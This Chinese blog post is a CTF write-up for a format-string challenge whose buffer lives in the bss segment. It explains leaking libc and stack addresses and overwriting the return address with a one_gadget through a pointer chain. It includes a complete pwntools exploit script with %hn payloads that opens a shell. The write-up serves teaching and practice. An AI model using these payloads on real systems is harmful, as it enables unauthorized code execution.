fmt在bss段(neepusec_easy_format)

最新推荐文章于 2023-01-29 23:01:23 发布
最新推荐文章于 2023-01-29 23:01:23 发布
阅读量418 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/117216276
版权

fmt在bss段(neepusec_easy_format)

1.gdb操作

  • vmapp

    在这里插入图片描述

  • stack

    在这里插入图片描述

  • retaddr

    在这里插入图片描述

2.思路

  1. 先泄漏能够泄漏的地址包括:当前站地址、libc地址

  2. 然后通过下面的指令进行地址写

    #这里是只要覆盖偏移为12的地址值的后两个字节
debug()
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()

#这里覆盖偏移为25的地址值的后两个字节
offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()

#修改的永远是指针指向的值
#############################################
payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')

debug()
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')

  3. 修改流程

    1. 未修改前

      在这里插入图片描述

    2. 第一次修改

      在这里插入图片描述

    3. 第二次修改

      在这里插入图片描述

    4. 第三次修改

      在这里插入图片描述

  4. 注意!!!每次修改的值都是二级指针指向的值,不能直接修改

    在这里插入图片描述

3. exp

from pwn import *
from LibcSearcher import *

p = process('./pwn')
#p = remote('neepusec.club',18757)
elf = ELF('./pwn')
context.log_level = 'debug'
def debug():
    gdb.attach(p)
    pause()

payload = '\x00'
p.sendlineafter(':\n',payload)
p.send('aaaa%23$pbbbb%8$p')
p.recvuntil('aaaa0x')
__libc_start_main = int(p.recv(12),16)-231
log.success('__libc_start_main===>'+hex(__libc_start_main))
libc = LibcSearcher('__libc_start_main',__libc_start_main)
libc_base = __libc_start_main - libc.dump('__libc_start_main')
log.success('libc_base==>'+hex(libc_base))
one = [0x4f3d5,0x4f432,0x10a41c]
one = one[0]+libc_base
log.success('one==>'+hex(one))
p.recvuntil('bbbb0x')
ret = int(p.recv(12),16) + 8
log.success('ret==>'+hex(ret))
debug()
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()

offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()

payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')

debug()
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
p.sendline('ls')
p.interactive()
huzai9527
关注
专栏目录
【FFmpeg】编码h.264时,支持的像素格式pix_fmt
郭老二
04-15 1万+
1、简述 使用FFmpeg对视频编码时,编码器格式AVCodecContext—>pix_fmt(类型 enum AVPixelFormat)不是什么格式都支持的。首先x264只支持YUV格式,不支持RGB格式。 2、像素格式列表 在FFmpeg(版本4.1)中编码h.264时,支持的像素格式pix_fmt列表如下: AV_PIX_FMT_YUV420P、 AV_PIX_FMT_YUVJ42...
君正SDK报VIDIOC_S_FMT error错误,编码器超时
weixin_44402152的博客
03-31 2073
项目场景: 项目新增sensor,sensor驱动tx-isp驱动由君正提供 问题描述: 编译生成固件运行主程序时出现 VIDIOC_S_FMT error、IMP_FrameSource_EnableChn、IMP_Encoder_PollingStream timeout。 以下是君正logcat完整日志: I/OSD ( 172): IMP_OSD_SetPoolSize:524288 D/VIDEO ( 172): imp_system_init start D/IMP-ISP (
PWN-COMPETITION-GeekChallenge2021
P1umH0的博客
11-15 765
PWN-COMPETITION-GeekChallenge2021
【PWN】格式化字符串漏洞原理
u014377094的博客
05-21 1630
今天做Dest0g3 520迎新赛的dest_love,发现是格式化字符串问题,但是由于其内容保存在了bss区,导致无法像过去那样简单利用,坐牢半天没做出来,但恰巧遇到了,就复习一下格式化字符串漏洞的基本原理吧,顺便补一下过去基本功不扎实的问题 首先是格式化字符串漏洞长啥样子 printf(format); //format是一个字符串 如何触发? 一般来说通过%p泄露内容,通过%n来写内容。 %p也可用%08x(32位)替代,不过还是推荐%p,因为%p无需考虑32还是64的问题。 t
格式化字符串漏洞
qq_52126646的博客
03-04 3678
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
bss上格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 1102
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss上 总结一下32位格式化字符串在bss上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么写:因为一般的格式化字符
音视频xxxx
csdn546229768的博客
01-29 2万+
本文章是以学习笔记形式展开记录。https://ffmpeg.xianwaizhiyin.net/base-knowledge/raw-yuv.html (理论)https://blog.csdn.net/leixiaohua1020/article/details/50534150 (实际)大概看了一下网上的音视频文章,目前来看文章大部分知识都是雷神那些CSND来的,难怪我leader说国内玩ffmpeg的搞来搞去就是那么点人,和我在学校期间学习Pwn和文章也是一样的现象内容都有雷同之处,~嗯。
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg)
03-09
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg),在使用ffmpeg解码aac的时候,如果使用avcodec_decode_audio4函数解码,那么解码出来的会是AV_SAMPLE_FMT_FLTP 格式的数据( float, 4bit , planar), 如果我们希望...
ffmpeg使用scale_npp进行AV_PIX_FMT_CUDA到AV_PIX_FMT_YUV420P的转换
我的博客
10-24 1717
ffmpeg中的filter使用及scale_npp转码cuda到BGR的示例代码
fmt_extension:{fmt}通过元组接口支持范围,容器和类型
05-17
auto ivf = fmt::format( " {} " , iv); assert (ivf == " { 1, 2, 3, 5, 7, 11 } " ); fmt::print ( " vector {} \n " , iv); std::pair< int64> pa1{ 42 , 3 . 14159265358979f }; fmt::print ( " pair {} \n " , ...
oracle rac环境监听,rac环境监听 - Oracle数据库管理 - ITPUB论坛-中国专业的IT技术社区...
weixin_42352981的博客
04-03 234
这是我在测试环境做的RAC 其中每个服务都包含两个实例(asm与plsextporc除外)Service "+ASM" has 1 instance(s).Instance "+ASM1", status BLOCKED, has 1 handler(s) for this service...Service "+ASM_XPT" has 1 instance(s).Instance "+ASM1...
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6609
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
CTF pwn题之格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
提取 汉字 拼音 首字母
sunhxp的专栏
11-09 2万+
<br />针对多音字不是很准确.<br /> <br /><br /> public static void main( String[] args ) {<br />  System.out.println( getGBKpy( "Hi.." ) ); //非汉字不转<br />  System.out.println( getGBKpy( "成都" ) );<br />  System.out.println( getGBKpy( "重庆" ) );  //多单字不准确<br /> }<br /> <
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1738
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss
qq_41667316的博客
07-13 760
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
django部署(Nginx)
HADLM
03-23 358
1.python3基础环境安装 tar xzvf Python-3.6.8.tgz cd Python-3.6.8 ./configure --prefix=/usr/local/python3 make && make install ln -s /usr/local/python3/bin/python3.6 /usr/bin/python3 ln -s /usr/local/python3/bin/pip3 /usr/bin/pip3 2.python3安装虚
mysql显示[Warning] IP address 'xxxx' could not be resolved: Name or service not known错误解决
热门推荐
帅气的可乐
08-26 4万+
mysql日志显示[Warning] IP address 'xxxx' could not be resolved: Name or service not known,那是因为mysql默认会反向解析DNS,对于访问者Mysql不会判断是hosts还是ip都会进行dns反向解析,频繁地查询数据库和权限检查,这大大增加了数据库的压力,导致数据库连接缓慢,严重的时候甚至死机,出现“连接数据库时出错
elog_set_fmt(ELOG_LVL_ERROR, ELOG_FMT_LVL | ELOG_FMT_TAG);设置当前系统时间
最新发布
06-01
`elog_set_fmt(ELOG_LVL_ERROR, ELOG_FMT_LVL | ELOG_FMT_TAG)` 是一个函数调用,它的作用是设置日志输出的格式。这个函数的第一个参数 `ELOG_LVL_ERROR` 表示设置的是错误级别的日志输出格式,第二个参数 `ELOG_FMT_LVL | ELOG_FMT_TAG` 表示设置的格式包括日志输出级别和标签信息。 至于你的问题,这个函数并没有直接设置当前系统时间的功能。如果你需要在日志中输出当前系统时间,可以在调用日志输出函数时传入一个时间戳参数,这个时间戳可以使用 `time` 函数获取当前的系统时间。例如: ``` elog_write(ELOG_LVL_ERROR, "tag", "Error message. Current system time: %ld", time(NULL)); ``` 这样就可以在日志输出中包含当前系统时间。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值